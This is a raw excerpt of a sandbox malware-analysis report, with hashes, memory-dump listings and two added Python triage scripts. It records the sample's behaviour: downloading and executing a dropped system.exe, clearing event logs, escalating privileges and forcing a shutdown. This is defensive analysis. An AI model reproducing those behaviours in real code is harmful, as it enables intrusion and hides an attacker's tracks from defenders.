                                                                      • Part of subcall function 1000A26E: FreeLibrary.KERNEL32(00000000), ref: 1000A33C
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 10005227
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 3789203340-3733053543
                                                                    • Opcode ID: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction ID: 73690dc3233638d327258afaa9b1a9bd386752b740394fc78971cbfd81933e0b
                                                                    • Opcode Fuzzy Hash: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction Fuzzy Hash: C1D0123B19E7203DF51953147D07F8D2384DF06A70F31415AF600290D59EA73AC1419D
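The function entries above list the Win32 calls the sandbox attributes to each disassembled routine: a download-and-execute pair (URLDownloadToFileA followed by ShellExecuteA on C:\Program Files\Windows NT\system.exe), event-log clearing (OpenEventLogA, ClearEventLogA, CloseEventLog), dynamic import resolution (LoadLibrary, GetProcAddress, FreeLibrary), and an ExitWindowsEx shutdown whose SeShutdownPrivilege is obtained through privilege APIs that only appear as GetProcAddress name strings. Reading those behaviours out of the raw listing by hand does not scale across a report with hundreds of such entries. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the "APIs" bullets into per-function call sets (folding the A/W suffixes and counting imports resolved by name), and tags each function from a small rule table. The sample input is constructed from the bullets printed in this section; the rule table and the ATT&CK technique IDs it attaches are the example's own assumptions.

```python
# Added example for this section, not Joe Sandbox code: parse the per-function
# "APIs" bullets of the report into call sets and tag the behaviour each shows.
# The rule table and its ATT&CK technique IDs are this example's own assumptions.
import re
from collections import namedtuple

# Constructed sample: the "APIs" bullets of four function entries from this
# section, copied as the page prints them (the literal arguments matter: they
# carry the drop path and the privilege name).
SAMPLE_REPORT = r"""
APIs
• URLDownloadToFileA.URLMON(00000000,10013F98,C:\Program Files\Windows NT\system.exe,00000000,00000000), ref: 0041201D
• ShellExecuteA.SHELL32(00000000,10013F90,C:\Program Files\Windows NT\system.exe,00000000,00000000,00000005), ref: 0041202D
Strings
APIs
• OpenEventLogA.ADVAPI32(00000000,10012C28), ref: 0040D323
• ClearEventLogA.ADVAPI32(00000000,00000000), ref: 0040D332
• CloseEventLog.ADVAPI32(00000000), ref: 0040D339
Memory Dump Source
APIs
• LoadLibraryW.KERNEL32(10013D74,1000C074,00000004,0040FD4E,?,?,?), ref: 0040FB77
• GetProcAddress.KERNEL32(00000000,10013D5C), ref: 0040FB89
• FreeLibrary.KERNEL32(00000000), ref: 0040FBAB
APIs
  • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A286
  • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000A2A1
  • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000A2AC
• ExitWindowsEx.USER32(?,00000000), ref: 10005227
"""

Call = namedtuple("Call", "api module args ref subcall")

# One "APIs" bullet: optional subcall prefix, Api.MODULE(args), ref: address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
NAME = re.compile(r"[A-Za-z_]\w*")                     # a symbol passed to GetProcAddress by name
HEX = re.compile(r"[0-9A-Fa-f]{8}")                    # a raw 32-bit value as the report prints it
ARTIFACT = re.compile(r"[A-Za-z]:\\|Se\w+Privilege$")  # file paths and privilege names

# (tag, ATT&CK technique, all of these APIs must be present, plus at least one of these)
RULES = [
    ("download-and-execute", "T1105", {"URLDownloadToFile"}, {"ShellExecute", "CreateProcess", "WinExec"}),
    ("clear-event-log", "T1070.001", {"ClearEventLog"}, set()),
    ("dynamic-api-resolution", "T1027.007", {"LoadLibrary", "GetProcAddress"}, set()),
    ("token-privilege-adjust", "T1134", {"AdjustTokenPrivileges"}, set()),
    ("forced-shutdown", "T1529", {"ExitWindowsEx"}, set()),
]


def canonical(api):
    """Fold the ANSI/Unicode suffix so OpenEventLogA and OpenEventLogW compare equal."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def parse_entries(text):
    """Group the bullets under each 'APIs' header; any other header closes the group."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            current.append(Call(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
        elif line.strip():
            current = None
    return [e for e in entries if e]


def apis_used(calls):
    names = {canonical(c.api) for c in calls}
    # An import resolved by name through GetProcAddress counts as used: the
    # shutdown routine only reveals AdjustTokenPrivileges that way.
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) > 1:
            target = c.args[1]
            if NAME.fullmatch(target) and not HEX.fullmatch(target):
                names.add(canonical(target))
    return names


def tag_entries(text):
    rows = []
    for idx, calls in enumerate(parse_entries(text)):
        present = apis_used(calls)
        tags = [tag for tag, _, need, any_of in RULES
                if need <= present and (not any_of or any_of & present)]
        rows.append({
            "function": idx,
            "refs": [c.ref for c in calls if c.subcall is None],
            "tags": tags,
            "attack": [tech for tag, tech, _, _ in RULES if tag in tags],
            "artifacts": sorted({a for c in calls for a in c.args if ARTIFACT.match(a)}),
        })
    return rows


if __name__ == "__main__":
    for row in tag_entries(SAMPLE_REPORT):
        print(row)
```

Run it on a whole report export and the "artifacts" column gives the pivot strings worth hunting for (the drop path under Program Files\Windows NT, the privilege name), while the "refs" column keeps the function addresses so each tag can be checked against the listing it came from. Note that the last function is tagged as dynamic API resolution and token-privilege adjustment only because the GetProcAddress name strings are folded in; on the direct calls alone it would show nothing but ExitWindowsEx.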
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$L
                                                                    • API String ID: 0-22657231
                                                                    • Opcode ID: abce3128562e71d86b539df3752428e18ef82fc4898b25a37cc6d66ed8c35b62
                                                                    • Instruction ID: 758f196e8a2dddc9846ca79366adee4ec73b23d2ac62ae420bb3af2073199815
                                                                    • Opcode Fuzzy Hash: abce3128562e71d86b539df3752428e18ef82fc4898b25a37cc6d66ed8c35b62
                                                                    • Instruction Fuzzy Hash: 73325C70A017199FDB21DF65CC88B9ABBF9FF44304F5046EAD509A7290EB70AA84CF54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2452939696-0
                                                                    • Opcode ID: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction ID: c03d28a1dd34d89bbcc1f663290b6a9b283fe8bb38574ef75e147567b18b88f0
                                                                    • Opcode Fuzzy Hash: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction Fuzzy Hash: E6D0127180021CFBCF01EBE4DD49CCD7BB9BB08288B004460FA06E1064D771E565DBD5
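A triage helper for the .sdmp file names listed under Memory Dump Source, added here as an example; it is not part of the Joe Sandbox report or tooling. How the dot-separated fields are read is an assumption and is not documented on this page: the fourth field is taken as the region base (it agrees with the "Offset:" printed beside each Source File), the fifth as the Win32 MEMORY_BASIC_INFORMATION Protect value and the seventh as the Type value. Every fifth- and seventh-field value on this page is a valid PAGE_* or MEM_* constant from winnt.h, which is what makes that reading plausible; the remaining fields are carried as opaque strings. Under that assumption the helper puts the image section at 0x401000 (mapped PAGE_EXECUTE_READWRITE) and the private executable regions at 0x227C000 and 0x244C000 at the top of the list, which is where unpacked code is normally found.

```python
"""Triage Joe Sandbox .sdmp memory-dump names by page protection and region type.

Added example, not Joe Sandbox code. Field reading is an ASSUMPTION (see the
lead-in): field 4 = region base, field 5 = MEMORY_BASIC_INFORMATION.Protect,
field 7 = MEMORY_BASIC_INFORMATION.Type. Fields 1, 2, 3, 6 and 8 are kept
but not interpreted.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection constants (low byte of Protect; PAGE_GUARD etc. are modifiers above it)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
# winnt.h region-type constants
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

HEX8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(
    rf"^{HEX8}\.{HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{HEX8}\.{HEX8}\.{HEX8}\.{HEX8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int
    opaque: tuple  # fields 1, 2, 3, 6 and 8, not interpreted here

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def is_executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def is_writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into a DumpRegion; raise ValueError for anything else."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    f = m.groups()
    return DumpRegion(name=name.strip(), base=int(f[3], 16), protect=int(f[4], 16),
                      mem_type=int(f[6], 16), opaque=(f[0], f[1], f[2], f[5], f[7]))


def classify(r: DumpRegion) -> str:
    """Coarse triage bucket; IMAGE_RWX and NONIMAGE_EXEC are the dumps to open first."""
    if r.is_image and r.is_executable and r.is_writable:
        return "IMAGE_RWX"      # mapped PE section that is writable and executable at once
    if r.is_executable and not r.is_image:
        return "NONIMAGE_EXEC"  # executable private/mapped memory: unpacked or injected code
    if r.is_image:
        return "IMAGE"          # image-backed with an ordinary protection
    return "DATA"


def triage(names):
    """Return (DumpRegion, bucket) pairs, most interesting bucket first, then by base address."""
    order = {"IMAGE_RWX": 0, "NONIMAGE_EXEC": 1, "IMAGE": 2, "DATA": 3}
    regions = [parse_sdmp_name(n) for n in names]
    return sorted(((r, classify(r)) for r in regions),
                  key=lambda rv: (order[rv[1]], rv[0].base))


# Dump names copied from the Memory Dump Source entries of this report (not constructed).
SAMPLE_DUMPS = [
    "00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp",
    "00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp",
    "00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r, bucket in triage(SAMPLE_DUMPS):
        print(f"{bucket:14} base=0x{r.base:08X} {r.protect_name:24} {r.mem_type_name}")
```

The bucket names are deliberately coarse: an image section reported as PAGE_EXECUTE_WRITECOPY or PAGE_EXECUTE_READWRITE means either the PE was linked with a writable code section or the protection was changed at runtime, and either way the dump of that region is the one to diff against the on-disk file; executable memory that is not image-backed is where a carved, unpacked payload is usually recovered.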
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction ID: a0557ea235724c5b15460b4ecd091286d83cdd9444977eeef37ab512aaca2bdd
                                                                    • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction Fuzzy Hash: ED621870D012288FCB98DF99C4D4AADB7B2FF8C311F608199E9816B745C7356A16CF60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P
                                                                    • API String ID: 0-3110715001
                                                                    • Opcode ID: 6e304fdd3c69d0d4c4cec106f5e179e862eecbb8531a3c8b1111759ff3e7f5a7
                                                                    • Instruction ID: 079a745f6601a0027906a544bb9e364348efa1010ac482293cb8ecf5244f3bf3
                                                                    • Opcode Fuzzy Hash: 6e304fdd3c69d0d4c4cec106f5e179e862eecbb8531a3c8b1111759ff3e7f5a7
                                                                    • Instruction Fuzzy Hash: DC425A71A01259CFDB24CF69C880BA9FBB1FF45308F1481AED949EB242DB749A85CF54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: f2dadd03a0f1952966ab383ee6b88dcbfe2e3d5e8c1163c45762e3bd9de8fed6
                                                                    • Instruction ID: bb4f461a16589c82c29dacdd2473dd6fc1b2bfe1e248b8d409257dffcaf46668
                                                                    • Opcode Fuzzy Hash: f2dadd03a0f1952966ab383ee6b88dcbfe2e3d5e8c1163c45762e3bd9de8fed6
                                                                    • Instruction Fuzzy Hash: F622D0706146718BDB2CCF29C080376BBE1BF46314F98885AE8868F2C5F334D54ACB68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: b
                                                                    • API String ID: 0-1908338681
                                                                    • Opcode ID: 82a10ceaa1c4634aaa7c9ac6aa4f36b5893c26342636d0b8cfd96095e9313954
                                                                    • Instruction ID: 5761671caaf17cd859e86fa4a21f4afc4da46d6ae8f21de66b1b2405d30afbe0
                                                                    • Opcode Fuzzy Hash: 82a10ceaa1c4634aaa7c9ac6aa4f36b5893c26342636d0b8cfd96095e9313954
                                                                    • Instruction Fuzzy Hash: DBC19E31564701EFDB22AF90D808F2B7BB9FB84B54F618A1DF2459B1A0D7B0C580CB52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x$v
                                                                    • API String ID: 0-3403762548
                                                                    • Opcode ID: c2cd46c2bc34abf14b9c9846857d1b52621ba6be7dbb992bbb0e9326e92621f7
                                                                    • Instruction ID: f03ad3769f489012a685ee150124b0171cbd189bf9c20b4b956187e98ed1cd8f
                                                                    • Opcode Fuzzy Hash: c2cd46c2bc34abf14b9c9846857d1b52621ba6be7dbb992bbb0e9326e92621f7
                                                                    • Instruction Fuzzy Hash: 40E1F2B1908384DFD324CF16C491B9BBBE5BB88714F108A2FE5998B390DB719509CF96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: qrks
                                                                    • API String ID: 0-3937875505
                                                                    • Opcode ID: ce76cf18d2dcfd513742720df803fbecff062468a8faea99b46ce499528d5b24
                                                                    • Instruction ID: 16d0fa1707a384fe1ce326628fda3e57fa9b8e9610cd773a1fcdb970b9d4592f
                                                                    • Opcode Fuzzy Hash: ce76cf18d2dcfd513742720df803fbecff062468a8faea99b46ce499528d5b24
                                                                    • Instruction Fuzzy Hash: 2A81C271625345AFDB10DFA5D884B2FBBE9EBC4768F04092EFA4487294DB30D904CB62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 8625bbddeec266dcb830a7a45d8b32e4f16b93675201f71dab0bb4d901d21eb9
                                                                    • Instruction ID: e195baa0916bb3cf34a9c112ef5643333d83b7152148fba4b9ff74402b9f4dc9
                                                                    • Opcode Fuzzy Hash: 8625bbddeec266dcb830a7a45d8b32e4f16b93675201f71dab0bb4d901d21eb9
                                                                    • Instruction Fuzzy Hash: 11816B71D61269EBCB21AF94DC4CBA9BBB8FF48710F1041DAF509AA250D7749A80DF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 79b789478b3ed08987b9a1d8f160ddb873a5a41c89bb66f35d53498aad1d8a43
                                                                    • Instruction ID: 5d8bd3ead5c6cfffb3e23ae7cfb8c099696d04374a40f463c09e9ed0bc98e992
                                                                    • Opcode Fuzzy Hash: 79b789478b3ed08987b9a1d8f160ddb873a5a41c89bb66f35d53498aad1d8a43
                                                                    • Instruction Fuzzy Hash: 0B718C71A102199FEF31CF64CC48FAAB7B9EF54314F5484A9E40AE7214DBB0AA81DF10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2v
                                                                    • API String ID: 0-1011470367
                                                                    • Opcode ID: d77793aaefde7801e9a245133cfa5b0e6437d7fa4ddc82b4eee92753e24e6368
                                                                    • Instruction ID: 2fdf50cee27b1e51fa2088436970bf84a8be3c96b93dd47585547c484774dcdc
                                                                    • Opcode Fuzzy Hash: d77793aaefde7801e9a245133cfa5b0e6437d7fa4ddc82b4eee92753e24e6368
                                                                    • Instruction Fuzzy Hash: CC51E3765043429BD760CE55C840B2BB3A9FB84728F160A2FFA51E7AC0D374D849CBA2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <Rv
                                                                    • API String ID: 0-683284065
                                                                    • Opcode ID: 3acaa15d01a12f7e578bd15340f2107f421636a3ff3a831603bd3bfdc0824523
                                                                    • Instruction ID: 531a07232583f3d5c2ccf52f2a55f8e7338eff0c48d4ceee4eb0f78e77f3844f
                                                                    • Opcode Fuzzy Hash: 3acaa15d01a12f7e578bd15340f2107f421636a3ff3a831603bd3bfdc0824523
                                                                    • Instruction Fuzzy Hash: 7151E273125981DFC212AB55D581E34B7BBFB09A28B16855EFA16CF241CF38E840CF1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: b322d8a6524f7a194ec333101aaf9ad7150931f19ce1f0fef164ac0758ea0d5c
                                                                    • Instruction ID: adf56320a119660889c0d8b76b0d0e0e7d37c92c3c0ad7046b4cd53e225de80d
                                                                    • Opcode Fuzzy Hash: b322d8a6524f7a194ec333101aaf9ad7150931f19ce1f0fef164ac0758ea0d5c
                                                                    • Instruction Fuzzy Hash: 78519071981218EFDB21DF94EC8DBAAB7B8FB44714F1105A9F509EB260DB70AA41CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: cdd0405eb82a25c609ab30a22e973abd5d1840801407189ee1aca224f1454cd5
                                                                    • Instruction ID: 7a2daad5a6ad4a6f5f960f65af42935f8723ffa4bb0a1d0fcb88e1bf1a552af3
                                                                    • Opcode Fuzzy Hash: cdd0405eb82a25c609ab30a22e973abd5d1840801407189ee1aca224f1454cd5
                                                                    • Instruction Fuzzy Hash: B341F371E60365ABCB209FE4D844BBA7AB9AF04B14F058166ED05AF38CE770ED44C791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: ef71b642dd56c5658d13364be176f0de291b09df42dd08f34e3029114f8ee278
                                                                    • Instruction ID: 56415c8844192e821695e092d685a05d8697c5a514ab14701a55639403c293a8
                                                                    • Opcode Fuzzy Hash: ef71b642dd56c5658d13364be176f0de291b09df42dd08f34e3029114f8ee278
                                                                    • Instruction Fuzzy Hash: C841D371E90304BBDB21ABD4DC4DFAE7BB8AB54B10F010055FA05BF295D7B1A904CBA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 54b462a6e7fe12c6ccfdacd10477e94ab7421cb175f675cbc04e41266e36c47e
                                                                    • Instruction ID: 8dc21d7f887c349f6dba57dd509c2710d13f31c97c0bccca442314dfc577d4e1
                                                                    • Opcode Fuzzy Hash: 54b462a6e7fe12c6ccfdacd10477e94ab7421cb175f675cbc04e41266e36c47e
                                                                    • Instruction Fuzzy Hash: 6341A172D1021AEFDB20CBE4D855FEEBBB8EB48724F110555FA11AB690D770A900CB64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: zdbf
                                                                    • API String ID: 0-2567057744
                                                                    • Opcode ID: e39e615abf8b25c6ea8ce75f55893e4917bb82f173632b74798ec50bf00fed88
                                                                    • Instruction ID: 2bfd9d0c23bde2f23d686f2227cc565443a4eb636f80265c6183aaea3703457f
                                                                    • Opcode Fuzzy Hash: e39e615abf8b25c6ea8ce75f55893e4917bb82f173632b74798ec50bf00fed88
                                                                    • Instruction Fuzzy Hash: 05411632B20301EBDB10DFD5DA94F6EB7B1EF88314F204525E902BB695C7B0A940CB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 3dc6c722b2bc57d608e2b926e21bf7029f5af4d8a490141f2d93bb254132be50
                                                                    • Instruction ID: 4e339d47c86e72ea454c9a7c1d686e4609de401c9f26bd5d73dfec3b4da96278
                                                                    • Opcode Fuzzy Hash: 3dc6c722b2bc57d608e2b926e21bf7029f5af4d8a490141f2d93bb254132be50
                                                                    • Instruction Fuzzy Hash: 6B41F336A10216AFCB14DFD8CC41ABEB7B5EF88300F544469E906AB254EB74AA01CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
